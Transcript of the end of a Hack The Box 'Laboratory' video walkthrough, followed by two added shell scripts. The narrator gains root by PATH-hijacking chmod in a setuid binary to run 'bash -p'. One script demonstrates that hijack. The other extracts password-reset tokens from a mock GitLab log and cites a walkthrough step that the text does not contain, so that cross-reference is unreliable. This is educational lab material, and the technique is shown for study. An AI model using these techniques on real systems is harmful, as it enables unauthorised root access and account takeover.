Download that. Oh, and it's actually... everything's still in here from, again, me doing this earlier. I'm sorry, I'm truly sorry. Let's run pspy, let's see what we got. You can see sleep 1 is happening out here, and there's a pgrep -fl unicorn, but those are all that 998, and that was one of the git values. I did notice CMD UID 0, where it's trying to do something as root, and we'll see these every now and again, but a ton, a ton of sleep zeros... excuse me, sleep 1. And I'm assuming this root might be coming from the container itself, like this root command, because we would still probably have visibility, right, on the Docker container in the instance there. But that's that. I guess we can let that run, we can let that keep cruising. I'll zoom out on that to see if anything worthwhile comes by, and let's actually get another shell going. Sorry, my terminal just gets extremely messy as I do these things. Where did I put dexter's SSH? Using that ssh directory, ssh -i... checking over in that other terminal, you can see that the container is still doing weird things. ssh -i /home/john/.ssh/id_rsa... no, no, not my RSA, I'm dumb. I was just reading and my mind kind of went blank there. dexter... dexter@laboratory.htb. There we go, we're logged in. Okay, you can see me log in. Sorry.

Maybe we should tune back to that setuid binary we had. We had LinPEAS, right? So let's go ahead and run LinPEAS, and again, you could use updog or any of those methods that we had, maybe netcat files back and forth, or any other file transfer thing to actually get that onto this box. That's kind of what I had done previously, and that's how I have a few of these in here, so I will clean up my tracks. But let's run LinPEAS. I actually use a modified version of LinPEAS that doesn't check if there's an internet connection, because it just hangs, because we know these Hack The Box machines don't have internet access. So let's try and let that one go. Oh, pspy is gonna light up. Whoops, whoops.
How this thing goes, see if it tracks anything down. LinPEAS is great because it has that legend, that key, that lets you know what could be very, very worthwhile to take a look at, highlighted in red, or bright red on yellow. We don't actually have a ton in here. There's a boot file system set up along with our actual hard, like, slash. We have python3, we have netcat; we're on the actual machine here now. But anyway, nothing egregiously sticks out, truth be told, to get that privilege escalation to get into the root user. But it's checking out service files, installed compilers. This is kind of something that I just tend to do: just stare repeatedly at the... I don't know what snap is doing, what these system files are doing. Something that I tend to do is repeatedly drown myself in the LinPEAS or LinEnum output and just keep rereading it. If I'm banging my head against the wall, if I don't know where I'm going next, I will just kind of keep looking. Is there anything here that's weird? Is there anything here that is likely there for a reason, right? So something that I always take a look at... I'll let this go for just a little bit more, but I don't want to drag this on any more than I kind of already have, because I know we're kind of getting to the end of our attention span, and to my attention span, that's for sure. Nothing sticks out, nothing is immediately noticeable. When we get to the setuid binaries, though, they do a good job, right, because LinPEAS is showcasing the stuff that does stick out. But you can't rely solely on that, and that's kind of why I did that manual find -perm -4000 to look for these setuid binaries without that color coding, because with the color coding, all we're looking for, all we're trained to look for, is, like, the stuff that's bright red or the stuff that's going to jump out at us. But I will quit beating around the bush, I will kind of bring it home: that /usr/local/bin/docker-security file that looked really weird
is really weird, and it's non-standard. I don't think I've ever seen a docker-security binary. Maybe you have; if you have, please let me know in the comments if that's, like, a normal thing that's just trying to latch onto, but it just doesn't. So let's go... actually, stop. Let's stop LinPEAS, and let's take a look at what this docker-security thing is. We know it's a setuid binary, because that's how we found it, but it's owned by root, so it's weird, and maybe we could abuse this thing, maybe we could take advantage of it. Can we strings that? Oh, we don't have strings. Well, we could download this thing if we really wanted to. I would actually recommend you do that if you were connecting with pwncat or something, or if you had an easy means to download. We could use updog again, just like curl POSTing it to it, to get it onto our own analyzing and attacker machine. But we can also just kind of, like, grep -a the binary out, and it will kind of still do the same thing for us. We'll have a lot of non-printable characters, but we will end up seeing some potential worthwhile strings in here. Some weird ones that I noticed were this chmod 700 /usr/bin/docker and chmod 660 /var/run/docker. Part of me wonders, is it just running those commands? Because if it is, maybe we could take advantage of that, maybe we could latch onto that if this is a setuid binary. /usr/bin/docker has its own, like, full absolute path here, but chmod is not being run with an absolute path here, so maybe we could do some PATH hijacking with, like, our own PATH variable. So I'll echo out the $PATH here, and none of those... sorry, well, have an extreme... okay. We know we're close to the end of the video, guys, where I keep clicking everything at random. We don't have anything that might indicate, okay, chmod is going to run. Otherwise we can kind of get in the way of it, we can get in the middle of this and have the system, have the program, once we were to run this /usr/local/bin/docker-security, we can have that
execute our own kind of poisoned, masqueraded version of chmod rather than the real chmod command. That's kind of the idea behind... do I have that actually anywhere? Did I leave a chmod in /dev/shm? And I was just being an idiot. I did. Production-quality professionalism, you guys know me. So if I were to do this in /tmp now, let's create our own chmod, and I'll just make this a script. I'll make it super dumb and super simple: it'll just run bash, maintaining, like, the setuid bit, bash -p. That's all I want, that's all I need for me. So I will mark this as an executable file. So now when I run it, I'm in a subshell of bash, but because I don't have a setuid bit set, that -p argument isn't going to do anything. So I'll exit out of this, and I'm just back to my original shell; I was in a subshell for that very single line. But if I were to now say, okay, let's set my PATH to the temporary directory with the value of PATH just following it, and then I were to try and run chmod, that command has the context following it. Okay, now we're going to run the chmod out of /tmp rather than the original chmod out of /usr/bin or wherever that actual binary is genuinely stored. So with that, we can go ahead and use that /usr/local/bin/docker-security, and it will run our chmod that will maintain that setuid bit, that -p argument we're passing to bash, and invoke bash as root, because we've kept that setuid privilege. So now, obviously, we're root, and that's that.

A lot of time I spent kind of banging my head against the wall on this one. I think the lesson learned was just really looking through that list, and as I mentioned, sometimes we kind of get caught up in LinPEAS because it shows us all that nice color coding and we get distracted and all we care about is looking for that. Don't forget about those ones, and maybe even looking manually can still, I don't know, ground you to look at some of the oddballs that just don't always fit. So there we go, we've rooted the
box, and that is the end of Laboratory from Hack The Box. Laboratory, don't forget that. Oh, so, I don't know, that was the first time I did some of those cool stuff with GitLab. I think it's incredible to see this vulnerability and kind of leveraging that local file inclusion technique to get your remote code execution. This was very cool. I didn't originally get this to work, and I was trying with the Metasploit version; the Metasploit version wasn't working. Once I finally got that Ruby reverse shell and figured out how to do that, I thought that was kind of neat. So that's definitely some good notes for me to take into account and to see later on. So I hope those were some cool takeaways for you, and I'm really glad to maybe finally do something a little bit more with Hack The Box, because I know I don't give them as much love as I nearly should, but hopefully we can do a heck of a lot more. So some neat tricks: using updog, using... and of course, if you wanted to, you could connect to this thing with pwncat. Like, do I have pwncat installed? Let's activate that environment. Let's run... what branch am I on? I want to make sure I'm not on the new development. Okay, good. So python -m pwncat -i, that was in home john ctf, hack the box, laboratory ssh dexter, okay, dexter@laboratory.htb, and I do not apparently have that set up and installed correctly, so that was a fluke. We'll edit that out. I was using revshells.com to be able to grab some of that reverse shell syntax. That's kind of 0day, Ryan Montgomery, over in the TryHackMe space, but he's putting out really cool stuff, and this is a really handy reference. But first time I'd ever heard of this video hacks guy; looks like he has a lot of other interesting videos that showcase some other exploits and stuff you can do with it, so that might be kind of a cool reference. A lot of stuff, really good for me to finally walk through this box. But man, I have been yapping for
quite some time, so I think that's the end of the video. Thank you guys so, so much for watching. I really hope you did get something good out of this one, and maybe, maybe I can get back to some Hack The Box stuff again. I super appreciate all the swag, thank you guys, and I'm so looking forward to that Cyber Apocalypse CTF getting started on Monday. So hey, you should go play, go register. I hope to see you on the scoreboard. Thanks so much, everybody. Please do like the video, please do all those YouTube algorithm things, and I'll see you in the next video. Bye.
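The PATH hijack the walkthrough ends on (a root-owned setuid binary that runs chmod by bare name, so a chmod placed in a directory prepended to PATH runs instead) reproduced here as an added example; this is not code from the video, and nothing in it needs root or a setuid bit. The two docker-security stand-ins are constructed shell scripts, the attacker's chmod only drops a marker file where the real attack put bash -p, and the hardened stand-in shows the two fixes that would have closed the hole (a pinned PATH and an absolute path to chmod).

```shell
#!/bin/sh
# Added example, not the video's code. Reproduces the PATH-hijack mechanics
# behind the docker-security privesc without any setuid bit: the two
# "docker-security" stand-ins below are CONSTRUCTED shell scripts, and the
# fake chmod only drops a marker file where the real attack would run bash -p.
set -eu

WORK=$(mktemp -d)
MARKER="$WORK/hijacked"

# Vulnerable stand-in: calls chmod by bare name, so whoever controls PATH
# decides which chmod actually runs (the pattern spotted with grep -a).
cat > "$WORK/docker-security-vuln" <<'EOF'
#!/bin/sh
touch "$1"
chmod 700 "$1"
EOF

# Hardened stand-in: pins PATH to system directories and calls chmod by
# absolute path, so an attacker-controlled directory is never searched.
cat > "$WORK/docker-security-fixed" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
touch "$1"
/bin/chmod 700 "$1"
EOF

# Attacker's chmod: record that it was executed, then hand off to the real
# one so the victim program does not notice anything odd.
cat > "$WORK/chmod" <<EOF
#!/bin/sh
echo hijacked > "$MARKER"
exec /bin/chmod "\$@"
EOF
chmod +x "$WORK/docker-security-vuln" "$WORK/docker-security-fixed" "$WORK/chmod"

# resolve_cmd NAME PATHVALUE: prints the file NAME resolves to under
# PATHVALUE, i.e. what the shell lookup (and execvp) would pick first.
resolve_cmd() {
    _saved_ifs=$IFS
    IFS=:
    for _dir in $2; do
        if [ -x "$_dir/$1" ]; then
            IFS=$_saved_ifs
            printf '%s\n' "$_dir/$1"
            return 0
        fi
    done
    IFS=$_saved_ifs
    return 1
}

# run_with_path PROGRAM PATHVALUE: runs PROGRAM with PATH=PATHVALUE and
# reports "hijacked" if the fake chmod ran, "clean" otherwise.
run_with_path() {
    rm -f "$MARKER"
    PATH="$2" "$1" "$WORK/target" >/dev/null 2>&1 || true
    if [ -f "$MARKER" ]; then echo hijacked; else echo clean; fi
}

echo "chmod resolves to:      $(resolve_cmd chmod "$WORK:$PATH")"
echo "vulnerable, evil PATH:  $(run_with_path "$WORK/docker-security-vuln"  "$WORK:$PATH")"
echo "vulnerable, sane PATH:  $(run_with_path "$WORK/docker-security-vuln"  /usr/bin:/bin)"
echo "hardened,   evil PATH:  $(run_with_path "$WORK/docker-security-fixed" "$WORK:$PATH")"
```

The third line of output is the point worth remembering when reviewing a setuid program: the bare-name call is only exploitable because the caller's environment is trusted. A real setuid binary that, like the one on the box, never resets PATH before calling chmod is vulnerable no matter how the rest of it is written.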
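The production.log step above (request parameters are logged as [FILTERED], but the raw token still shows up near the "Reset password instructions" mail, and only the most recent one is the live one) as an added example that is not the video's script. The log content is constructed to mimic the Rails/Devise format; git.laboratory.htb, 10.10.14.25 and admin@example.com come from the walkthrough, the tokens and the dexter@laboratory.htb address are made up. The second function is the check the video hints at: filter by recipient, so a reset triggered for one user is never confused with the latest token for another.

```shell
#!/bin/sh
# Added example, not the video's code. Pulls reset_password_token values out of
# a GitLab/Rails production.log. The log below is CONSTRUCTED to mimic the
# format: form params are logged as "[FILTERED]", but the Devise reset link in
# the logged "Reset password instructions" mail still carries the raw token.
set -eu

LOG=$(mktemp)
cat > "$LOG" <<'EOF'
Started POST "/users/password" for 10.10.14.25 at 2021-04-17 10:00:01 +0000
Processing by PasswordsController#create as HTML
  Parameters: {"utf8"=>"1", "authenticity_token"=>"[FILTERED]", "user"=>{"email"=>"admin@example.com"}}
Sent mail to admin@example.com (31.2ms)
Subject: Reset password instructions
<a href="https://git.laboratory.htb/users/password/edit?reset_password_token=oldAdminTok_1111">Change my password</a>
Started POST "/users/password" for 10.10.14.25 at 2021-04-17 10:04:40 +0000
Sent mail to admin@example.com (28.9ms)
Subject: Reset password instructions
<a href="https://git.laboratory.htb/users/password/edit?reset_password_token=newAdminTok-2222">Change my password</a>
Started PUT "/users/password" for 10.10.14.25 at 2021-04-17 10:05:10 +0000
  Parameters: {"user"=>{"reset_password_token"=>"[FILTERED]", "password"=>"[FILTERED]"}}
Sent mail to dexter@laboratory.htb (30.1ms)
Subject: Reset password instructions
<a href="https://git.laboratory.htb/users/password/edit?reset_password_token=dexterTok_3333">Change my password</a>
EOF

# latest_reset_token FILE
# Prints the last raw token that appears as a URL parameter. "[FILTERED]"
# entries never match the token= pattern, so they are skipped for free.
latest_reset_token() {
    grep -o 'reset_password_token=[A-Za-z0-9_-]*' "$1" | tail -n 1 | cut -d= -f2
}

# latest_reset_token_for FILE EMAIL
# Same, but only counts tokens inside mail sent to EMAIL, so the most recent
# reset for one user is not mistaken for the token of another.
latest_reset_token_for() {
    awk -v who="$2" '
        /^Sent mail to / { current = ($4 == who) }
        current && match($0, /reset_password_token=[A-Za-z0-9_-]+/) {
            tok = substr($0, RSTART + 21, RLENGTH - 21)
        }
        END { if (tok != "") print tok }
    ' "$1"
}

echo "last token in log:    $(latest_reset_token "$LOG")"
echo "last token for admin: $(latest_reset_token_for "$LOG" admin@example.com)"
```

With a real log, run the filtered variant against the account you actually reset; the plain grep returns whatever reset happened last, which on a shared instance may belong to someone else.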
Info
Channel: John Hammond
Views: 56,342
Id: PgQyuogGgPI
Length: 73min 43sec (4423 seconds)
Published: Sat Apr 17 2021